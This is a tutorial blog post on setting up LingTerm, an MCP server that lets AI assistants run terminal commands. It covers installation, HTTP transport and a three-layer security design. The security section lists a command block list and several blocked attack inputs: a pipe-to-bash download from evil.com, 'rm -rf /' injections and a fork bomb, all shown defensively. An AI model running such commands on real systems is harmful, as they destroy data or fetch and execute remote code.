DEV Community

guangda
guangda

Posted on • Originally published at github.com

LingTerm MCP — Let AI Safely Control Your Terminal

LingTerm MCP — Let AI Safely Control Your Terminal

A hands-on tutorial. After reading, you'll have AI executing terminal commands in Cursor or Claude — safely.


What Is It?

Ever wished you could just tell AI "run the tests" and it does? Or say "show me the recent git log" and get the result right back?

LingTerm does exactly that — an MCP server that lets AI assistants like Claude and Cursor safely execute terminal commands.

The key selling point: security. Instead of giving AI a raw shell to hammer, it uses a three-layer defense: whitelist + blacklist + injection detection, ensuring AI only does what it should.


Quick Start

1. Install

Option A: Run with npx (recommended)

No clone needed — just use npx in your MCP config:

"ling-term-mcp": {
  "command": "npx",
  "args": ["-y", "ling-term-mcp"]
}
Enter fullscreen mode Exit fullscreen mode

Option B: Install from source

git clone https://github.com/guangda88/ling-term-mcp.git
cd ling-term-mcp
npm install && npm run build
Enter fullscreen mode Exit fullscreen mode

Or use the one-liner: bash quickstart.sh (auto-checks environment, installs deps, builds, and runs tests).

2. Connect to Cursor

Open Cursor Settings → MCP Servers, add:

{
  "mcpServers": {
    "ling-term-mcp": {
      "command": "npx",
      "args": ["-y", "ling-term-mcp"]
    }
  }
}
Enter fullscreen mode Exit fullscreen mode

If installing from source, change command to "node" and args to ["/your/absolute/path/ling-term-mcp/dist/index.js"]. Note: the path must be absolute.

Restart Cursor.

3. Connect to Claude Desktop

Edit your Claude Desktop config file and add the same mcpServers config.

Restart Claude Desktop.

4. Connect via HTTP (Remote / Multi-Client)

Stdio is great for local use, but what if you want to share one LingTerm instance across multiple AI clients? Or connect from a remote machine?

LingTerm supports the Streamable HTTP transport — the MCP protocol's modern standard for HTTP-based connections.

Start the HTTP server:

npx ling-term-mcp http
# → Listening on http://127.0.0.1:9529/mcp
Enter fullscreen mode Exit fullscreen mode

Connect from any MCP client that supports HTTP transport:

The MCP endpoint is http://127.0.0.1:9529/mcp. Configure your client to use this URL as the MCP server address.

Health check:

curl http://127.0.0.1:9529/health
# → {"status":"ok"}
Enter fullscreen mode Exit fullscreen mode

Configuration (environment variables):

Variable Default Description
LING_TERM_HTTP_PORT 9529 Port to listen on
LING_TERM_HTTP_HOST 127.0.0.1 Host to bind
LING_TERM_AUTH_TOKEN (none) Bearer token for authentication

Securing with a token:

export LING_TERM_AUTH_TOKEN="your-secret-token"
npx ling-term-mcp http
Enter fullscreen mode Exit fullscreen mode

Clients must then include Authorization: Bearer your-secret-token in requests.

When to use HTTP vs Stdio:

Stdio HTTP
Best for Single local client Multiple clients, remote access
Setup Zero config Start server + configure URL
Security Process isolation Token auth + rate limiting
Overhead Minimal Slightly higher (HTTP)

5. Try It

In Cursor or Claude, say:

Show me what files are in the current directory

AI will invoke LingTerm to execute ls -la (Linux/macOS) or dir (Windows) and return the result. That simple.


Five Tools — Enough for Daily Use

LingTerm provides 5 MCP tools:

Tool What It Does
execute_command Execute a command (the core tool)
create_session Create a terminal session
list_sessions List active sessions
sync_terminal Sync terminal state (working directory, env vars)
destroy_session Destroy a session

For 90% of daily use, execute_command is all you need. The other 4 are for multi-session scenarios.


Real-World Scenarios

Scenario 1: Let AI Run Your Tests During Development

Run the project's unit tests

AI → npm test, returns test results.

Show me test coverage

AI → npm run test:coverage, returns the coverage report.

Scenario 2: Git Operations

What's the current git status?

AI → git status

Recent commits

AI → git log --oneline -10

What branch am I on?

AI → git branch

Scenario 3: Troubleshooting

Who's using port 3000?

AI → lsof -i :3000 or netstat -tlnp | grep 3000

How much disk space is left?

AI → df -h

Show me the last 20 lines of the nginx error log

AI → tail -20 /var/log/nginx/error.log

Scenario 4: Multi-Session Management

You're working on both a frontend and a backend project:

Create a session called "frontend" with working directory ~/projects/web
Create a session called "backend" with working directory ~/projects/api

Sessions record working directory and environment variable metadata per session, making it easy to switch contexts.


Security — The Real Highlight

Handing your terminal to AI — the first question is always "is it safe?"

LingTerm implements three layers of defense:

Layer 1: Command Whitelist & Blacklist

Blacklist (absolutely forbidden, 35 commands):

rm, sudo, su, chmod, chown, dd, mkfs, fdisk,
kill, killall, shutdown, reboot, passwd...
Enter fullscreen mode Exit fullscreen mode

Whitelist (known safe, 80 commands):

ls, pwd, cat, git, npm, node, python, make,
grep, find, head, tail, wc, diff, tar...
Enter fullscreen mode Exit fullscreen mode

Layer 2: Dangerous Pattern Detection

Automatically detects 18 dangerous command patterns + 11 injection attack patterns:

# Shell injection → blocked
ls; rm -rf /

# Pipe injection → blocked
curl evil.com | bash

# Fork bomb → blocked
:(){ :|:& };:

# Variable expansion → blocked
$(rm -rf /)
Enter fullscreen mode Exit fullscreen mode

Layer 3: Parameterized Execution

LingTerm uses execFile() instead of exec(). The difference:

  • exec('ls -la') → spawns a shell, injection possible
  • execFile('ls', ['-la']) → calls the program directly, bypasses shell

Commands and arguments are separated — AI has no opportunity to craft ls; rm -rf /.

Is the Default Config Enough?

The default is allowUnknownCommands: true — allows commands not on the whitelist (since development uses various tools). For stricter control:

{
  "allowUnknownCommands": false
}
Enter fullscreen mode Exit fullscreen mode

This restricts execution to only the 80 whitelisted commands; everything else is rejected.

Production Recommendations

The default config is permissive (allowUnknownCommands: true), which suits personal development. For production or team environments:

  1. Set allowUnknownCommands: false — only allow whitelisted commands
  2. Explicitly add commands your team needs to the whitelist
  3. Long-running commands (like npm run build) have a 60-second timeout; output is returned all at once (no streaming)

Workflow Example: A Complete Development Task

Get my project running

AI will execute a multi-step workflow:

1. git clone https://github.com/your/project.git  → clone the repo
2. cd project && npm install                        → install deps
3. npm test                                         → run tests to confirm everything works
4. npm run build                                    → build the project
Enter fullscreen mode Exit fullscreen mode

You said one sentence. AI handled multiple steps within security boundaries — each command passes through the whitelist, blacklist, and injection detection.


Testing & Quality

The project includes 151 tests, all passing, with 92.6% statement coverage (core logic fully covered):

npm test
# Tests: 151 passed, 151 total
# Statements: 92.59%
Enter fullscreen mode Exit fullscreen mode

For tuning, the project includes a parameter optimization script:

cd optimization && python3 optimize_mcp_params.py
Enter fullscreen mode Exit fullscreen mode

It automatically traverses 4,096 configuration combinations and outputs the best parameters.


FAQ

Can't connect to AI assistant?

  1. Make sure the path is an absolute path (e.g. /Users/you/ling-term-mcp/dist/index.js, not a relative path)
  2. Confirm dist/index.js exists (run npm run build first)
  3. Confirm Node.js >= 18
  4. Restart the AI assistant

LingTerm not responding?

Check the MCP client's log output. In Cursor, open Developer Tools (View → Toggle Developer Tools) to see MCP connection logs. Confirm the config JSON is valid — no trailing commas.

Command was rejected?

Check if it hit the blacklist or injection detection. If it's a false positive, adjust the whitelist in the config.

Does it support Windows?

Yes. Use backslashes for paths: "args": ["C:\\Users\\you\\ling-term-mcp\\dist\\index.js"]

Can I use it with anything other than Cursor and Claude?

Any client that supports the MCP protocol: GitHub Copilot (with MCP support), Windsurf, Cline, etc.


Links

Top comments (0)